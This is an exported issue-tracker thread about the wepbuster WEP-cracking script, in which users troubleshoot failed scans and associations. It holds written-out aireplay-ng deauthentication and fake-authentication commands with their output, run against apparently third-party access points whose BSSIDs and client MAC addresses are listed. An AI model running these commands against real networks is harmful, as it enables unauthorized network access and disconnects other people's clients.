still no find ap's

[GoogleCodeExporter]

While freshly rebooted and making sure the drivers are loaded properly

Rebooted ok, and drivers loaded, see dmseg...

zd1211rw 1-7:1.0: phy0
usbcore: registered new interface driver zd1211rw
udev: renamed network interface wlan0 to wlan1

What do you see when you run "ifconfig"
# ifconfig 
eth0, eth1, lo, ...

wlan1     Link encap:Ethernet  HWaddr 00:02:72:6f:a2:f9  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

What do you see when you run "iwconfig"

wlan1     IEEE 802.11bg  ESSID:""  
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   
          Tx-Power=0 dBm   
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

What do you see when you run "airmon-ng"

wlan1       ZyDAS 1211  zd1211rw - [phy1]

Which Linux are you using?

Ubuntu 9.04 with your precompiled aircrack/airodump

Which wireless card/s are you using?
1. Chipset: Zydas
2. Driver: ZD1211RW

Which interfaces are you supposed to be using or expecting wepbuster to
find?
1. as an injection interface: wlan1
2. as monitor interface: mon0

Which revision in SVN are you using?
aircrack-ng-1.0rc3_wepbuster.tgz

Did you change and recompile the aircrack-ng sources?
I use your precompiled files

What do you see when you do a "ps ax |grep perl && ps ax |grep air" while
running the program

root     20912  0.4  0.0      0     0 pts/0    Z+   20:24   0:00
[airmon-ng] <defunct>
root     20964  0.0  0.0      0     0 pts/0    Z+   20:24   0:00
[airmon-ng] <defunct>
root     21098  0.0  0.0   3748  1108 pts/0    S+   20:24   0:00
airodump-ng mon0 -t wep -c 6 -n -w chan6

Did you try setting these three manually?

yes
1. $inject_iface: wlan1
2. $monitor_iface: mon0 
3. $mac_address: 00:02:72:6f:a2:f9

Did you read the "Troubleshooting" in the wiki???

Yes

Did you try running airodump-ng -t WEP using $monitor_iface and you are
certain that you are seeing WEP-enabled access points and not some odd
shaped object that looks like a nuclear silo?

;) yes...

 00:02:CF:B5:3C:30    4        2        0    0  12  54 . WEP  WEP        
WLAN_F2                                                                   

 00:01:38:6D:FA:C0    4        9        0    0   6  54 . WEP  WEP        
WLAN_7F                                                                   

 00:23:F8:90:E8:56    7        8        0    0   9  54 . WEP  WEP        
PDG101A                                                                   

 00:06:B1:20:EC:6A   15        8        1    0   1  11   WEP  WEP        
<length:  8> 

Did you run into some hot chick lately?

I do not know ;)

Original issue reported on code.google.com by mserrafo...@gmail.com on 5 Jun 2009 at 6:30

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

sorry, i forgot to ask.. what did you see in the output of wepbuster??? =) in 
the 7th item, i'm seeing some 
defunct processes.. you might want to do a "pkill -9 air && pkill -9 perl" and 
start all over again..

Original comment by markjays...@gmail.com on 5 Jun 2009 at 7:06

[GoogleCodeExporter]

I do pkill -9 air && pkill -9 perl with the same result...

# perl wepbuster 

Detecting wireless interfaces...

---------------------------------------------------

Found wlan1...
Getting monitor interface...
monitor interface --> mon0

Found 1 useable wireless card(s)
 1) wlan1/mon0

MODE: crack (using: wlan1/mon0 == 00:02:72:6f:a2:f9)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 11 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 11

Scanning channel 1 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 1

Found no AP. Exiting...

 CH 11 ][ Elapsed: 16 s ][ 2009-06-06 16:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID     

 00:1A:2B:3D:50:D0    8        5        0    0  11  54   WEP  WEP         JAZZTEL_87

 00:06:B1:20:EC:6A   13        6        0    0   1  11   WEP  WEP         <length: 
8>                                                          
 00:02:CF:B5:3C:30   10       10        0    0  12  54 . WEP  WEP         WLAN_F2   

 00:23:F8:90:E8:56   10       14        0    0   9  54 . WEP  WEP         PDG101A 

Original comment by mserrafo...@gmail.com on 6 Jun 2009 at 2:57

[GoogleCodeExporter]

sometimes when this happens to me, all i do is just reload the driver and wait 
for a few seconds.. have you tried 
that?

Original comment by lem0ngr...@fastmail.fm on 6 Jun 2009 at 3:21

[GoogleCodeExporter]

yes, I tried that with no luck...

root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# rmmod zd1211rw
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# modprobe zd1211rw
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# pkill -9 air && 
pkill -9 perl
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# ifconfig wlan1 down
root@michael:/media/sdc1/home/marc/Desktop/tarball_staging# perl wepbuster 

Detecting wireless interfaces...

---------------------------------------------------

Found wlan1...
Getting monitor interface...
monitor interface --> mon0

Found 1 useable wireless card(s)
 1) wlan1/mon0

MODE: crack (using: wlan1/mon0 == 00:02:72:6f:a2:f9)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 11 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 11

Scanning channel 1 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 1

Found no AP. Exiting...

Original comment by nandelb...@gmail.com on 9 Jun 2009 at 2:32

[GoogleCodeExporter]

did you try increasing the scan duration? also check if wepbuster is indeed 
executing the precompiled aircrack-
ng programs. when you run wepbuster and finished scanning the first channel, 
hit ctrl+c and try to find if there 
is any .csv file created by airodump in the current directory. Open that csv 
and check if there is any AP listed. I'm 
suspecting that you did not tell wepbuster to use the modified aircrack-ng 
programs..

Original comment by markjays...@gmail.com on 9 Jun 2009 at 3:55

[GoogleCodeExporter]

This is how I got the precompiled aircrack-ng and airodump-ng to work for me.
GOTO:
/usr/local/bin and /usr/local/sbin

look for aircrack-ng and airodump-ng and overwrite it. After that wepbuster 
should
work fine. Also some OS done support -n and also iwconfig <interface> mode 
managed,
so you might wanna remove those of comment out those lines. Hope this can help 
us
all, so that we can get this to roll out in BackTrack 4-final.

Original comment by ghostfac...@gmail.com on 10 Jun 2009 at 3:32

[GoogleCodeExporter]

After restart the process...

MODE: crack (using: wlan1/mon1 == 00:02:72:69:31:5c)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 11 for WEP-enabled Access Points
......
Found 1 AP(s) on channel 11

     BSSID      IV  CHANNEL SSID           ASSOCIATED CLIENTS

00:14:BF:C3:07:CB   3   11  mx          

Scanning channel 1 for WEP-enabled Access Points
......
Found 1 AP(s) on channel 1

     BSSID      IV  CHANNEL SSID           ASSOCIATED CLIENTS

B6:81:57:F4:64:BC   12  1   MX1901FA          00:00:0C:07:AC:00, 00:1E:0B:0C:92:FC,
00:0E:6A:92:15:A4, 00:1A:64:36:65:8C, 00:18:8B:8A:DF:11, 00:B0:C2:8D:B4:B6,
00:0C:29:C5:8E:47, 00:16:76:2D:30:A5

Total AP found: 2

Now starting to crack...

#########################################################

Pwning "mx" (00:14:BF:C3:07:CB)
Checking for mac filtering...
Can't associate. aireplay-ng died!

#########################################################

Pwning "MX1901FA" (B6:81:57:F4:64:BC)
Checking for mac filtering...
Can't associate. aireplay-ng died!

#########################################################

Can't associte

Original comment by nandelb...@gmail.com on 10 Jun 2009 at 9:20

[GoogleCodeExporter]

Try the latest SVN revision. Could be because of that -D option of aireplay-ng. 
If it
doesn't work, read the latest revision of README.TXT, it contains the actual
aireplay-ng commands used. Run it manually against those APs in question and 
see if
you will get the same result.

Original comment by markjays...@gmail.com on 10 Jun 2009 at 9:37

[GoogleCodeExporter]

the same result with the latest revision (46)...

No valid channel entered. Using the default ( US = 1 6 11 )

MODE: crack (using: wlan1/mon3 == 00:02:72:69:31:5c)

Scanning channel 6 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 6

Scanning channel 1 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 1

.
Scanning channel 11 for WEP-enabled Access Points
.....
Found 1 AP(s) on channel 11

     BSSID      IV  CHANNEL SSID           ASSOCIATED CLIENTS

00:14:BF:C3:07:CB   609 11  mx          

Total AP found: 1

Now starting to crack...

#########################################################

Pwning "mx" (00:14:BF:C3:07:CB)
Checking for mac filtering...
Can't associate. aireplay-ng died!

#########################################################

Executing the commands individually...

root@mula-laptop:/home/mula/wepbuster-read-only# aireplay-ng -0 1 -a
00:14:BF:C3:07:CB mon3 -h 00:02:72:69:31:5c 2>&1
11:47:56  Waiting for beacon frame (BSSID: 00:14:BF:C3:07:CB) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:47:56  Sending DeAuth to broadcast -- BSSID: [00:14:BF:C3:07:CB]
root@mula-laptop:/home/mula/wepbuster-read-only# aireplay-ng -1 1 -a
00:14:BF:C3:07:CB -e mx mon3 -h 00:02:72:69:31:5c 2>&1
11:48:42  Waiting for beacon frame (BSSID: 00:14:BF:C3:07:CB) on channel 11

11:48:42  Sending Authentication Request (Open System)

11:48:44  Sending Authentication Request (Open System)

11:48:46  Sending Authentication Request (Open System)

11:48:48  Sending Authentication Request (Open System)

11:48:50  Sending Authentication Request (Open System)

11:48:52  Sending Authentication Request (Open System)

11:48:54  Sending Authentication Request (Open System)

11:48:56  Sending Authentication Request (Open System)

11:48:58  Sending Authentication Request (Open System)

11:49:00  Sending Authentication Request (Open System)

11:49:02  Sending Authentication Request (Open System)

11:49:04  Sending Authentication Request (Open System)

11:49:06  Sending Authentication Request (Open System)

11:49:08  Sending Authentication Request (Open System)

11:49:10  Sending Authentication Request (Open System)

11:49:12  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@mula-laptop:/home/mula/wepbuster-read-only# aireplay-ng -1 6000 -o 1 -q 10 
-a
00:14:BF:C3:07:CB -e mx mon3 -h 00:02:72:69:31:5c 
11:49:48  Waiting for beacon frame (BSSID: 00:14:BF:C3:07:CB) on channel 11

11:49:48  Sending Authentication Request (Open System)

11:49:50  Sending Authentication Request (Open System)

11:49:52  Sending Authentication Request (Open System)

11:49:54  Sending Authentication Request (Open System)

11:49:56  Sending Authentication Request (Open System)

11:49:58  Sending Authentication Request (Open System)

11:50:00  Sending Authentication Request (Open System)

11:50:02  Sending Authentication Request (Open System)

11:50:04  Sending Authentication Request (Open System)

11:50:06  Sending Authentication Request (Open System)

11:50:08  Sending Authentication Request (Open System)

11:50:10  Sending Authentication Request (Open System)

11:50:12  Sending Authentication Request (Open System)

11:50:14  Sending Authentication Request (Open System)

11:50:16  Sending Authentication Request (Open System)

11:50:18  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

I think the problem is with this card... can't associate. But one thing... with 
the
same card and BackTrack 3 I can crack this AP... what's happens?

Original comment by nandelb...@gmail.com on 10 Jun 2009 at 9:52

[GoogleCodeExporter]

you see.. it is no longer the problem of the script.. for that, you have to ask 
the
aircrack-ng authors.. They even gave several reasons why it failed, right?. So 
there
you have it... :-)

Original comment by markjays...@gmail.com on 10 Jun 2009 at 9:57

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

;)

Thank you! And sorry for spend your time!

Original comment by nandelb...@gmail.com on 10 Jun 2009 at 10:33

[GoogleCodeExporter]

Original comment by markjays...@gmail.com on 12 Jun 2009 at 5:06

• Changed state: Fixed